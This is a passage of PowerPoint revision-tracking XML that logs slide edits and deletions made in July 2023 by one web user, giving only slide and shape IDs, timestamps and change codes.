            <pc:docMk/>
            <pc:sldMk cId="0" sldId="264"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:13:54.103" v="2065" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="264"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T19:16:11.884" v="1332"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="346"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T19:15:33.179" v="1250" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="346"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:17:28.299" v="2079"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="347"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:01:49.153" v="1879" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="347"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:05:44.506" v="1930" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="347"/>
            <ac:spMk id="4" creationId="{8F57D77F-0B26-F627-F82D-934E2347436E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:02:24.576" v="1884" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="348"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:02:24.576" v="1884" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="348"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T19:57:50.050" v="1708"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="348"/>
            <ac:graphicFrameMk id="6" creationId="{409DE0C5-815C-583B-1D3A-2E7750D9F924}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T19:14:03.130" v="1202"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3094066351" sldId="1073"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T18:58:55.227" v="63" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3094066351" sldId="1073"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T19:14:03.130" v="1202"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3094066351" sldId="1073"/>
            <ac:graphicFrameMk id="4" creationId="{40064EF4-EE2B-342C-EA9E-699582F380FF}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:11:15.159" v="2051"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1525672446" sldId="1075"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T19:00:56.778" v="164" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1525672446" sldId="1075"/>
            <ac:spMk id="5" creationId="{7188AF34-F17D-65FE-91B6-733B90851DC8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:11:15.159" v="2051"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1525672446" sldId="1075"/>
            <ac:graphicFrameMk id="4" creationId="{40064EF4-EE2B-342C-EA9E-699582F380FF}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:09:38.234" v="2003" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2669178660" sldId="1078"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T18:59:05.524" v="67" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2669178660" sldId="1078"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:09:38.234" v="2003" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2669178660" sldId="1078"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T19:11:58.267" v="1029"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1653445732" sldId="1081"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T19:10:35.702" v="1001" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1653445732" sldId="1081"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:08:16.230" v="2002" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="205556993" sldId="1101"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:02:14.326" v="1881" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="205556993" sldId="1101"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:08:16.230" v="2002" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="205556993" sldId="1101"/>
            <ac:spMk id="4" creationId="{8E9D2EEE-39FF-901E-B51E-3B5A0EC61268}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:03:54.689" v="1904" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1593495054" sldId="1102"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:01:05.948" v="1878" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1593495054" sldId="1102"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:03:54.689" v="1904" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1593495054" sldId="1102"/>
            <ac:spMk id="4" creationId="{8F57D77F-0B26-F627-F82D-934E2347436E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:10:20.470" v="2013"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2332079863" sldId="1103"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T18:59:37.900" v="82" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2332079863" sldId="1103"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T18:59:32.791" v="78" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2332079863" sldId="1103"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T19:14:15.630" v="1203"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2910232517" sldId="1105"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T18:58:59.868" v="64" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2910232517" sldId="1105"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:17:00.642" v="2077"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4146784984" sldId="1106"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:14:52.418" v="2068" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4146784984" sldId="1106"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp modNotes">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:17:33.534" v="2081"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1159470150" sldId="1183"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:02:00.732" v="1880" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1159470150" sldId="1183"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:06:47.289" v="1971" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1159470150" sldId="1183"/>
            <ac:spMk id="4" creationId="{8F57D77F-0B26-F627-F82D-934E2347436E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:06:49.430" v="1972"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1884904595" sldId="1184"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:06:50.961" v="1973"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3717721043" sldId="1185"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:06:52.305" v="1974"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3471282883" sldId="1186"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:06:53.883" v="1975"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2568450806" sldId="1187"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:06:56.524" v="1976"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2896371669" sldId="1188"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:02:36.249" v="1888"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1766237039" sldId="1189"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:02:33.702" v="1886" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1766237039" sldId="1189"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:02:36.249" v="1888"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1766237039" sldId="1189"/>
            <ac:graphicFrameMk id="6" creationId="{409DE0C5-815C-583B-1D3A-2E7750D9F924}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T19:53:20.696" v="1461"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="646456136" sldId="1190"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T19:53:22.352" v="1462"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="503662233" sldId="1191"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T18:59:18.962" v="74" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3573718190" sldId="1192"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T18:59:18.962" v="74" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3573718190" sldId="1192"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T18:59:15.915" v="72" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3573718190" sldId="1192"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:10:16.844" v="2012" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2962076875" sldId="1193"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T18:59:23.087" v="75" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2962076875" sldId="1193"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{24849128-C7FA-2B5E-EB24-5561BDF4A83D}" dt="2023-07-07T20:10:16.844" v="2012" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2962076875" sldId="1193"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}"/>
    <pc:docChg chg="addSld delSld modSld">
      <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T22:37:10.500" v="4109" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:33:19.017" v="49" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="naumann" userId="S::naumann_nce.ufrj.br#ext#@cisco.onmicrosoft.com::e99cf90b-3b07-4608-8d54-c7ecb3aa7617" providerId="AD" clId="Web-{C8DF0870-4C0E-1D5D-B4A7-8FC5600F4711}" dt="2023-07-10T14:33:12.595" v="47" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="264"/>
            <ac:spMk id="4" creationId="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
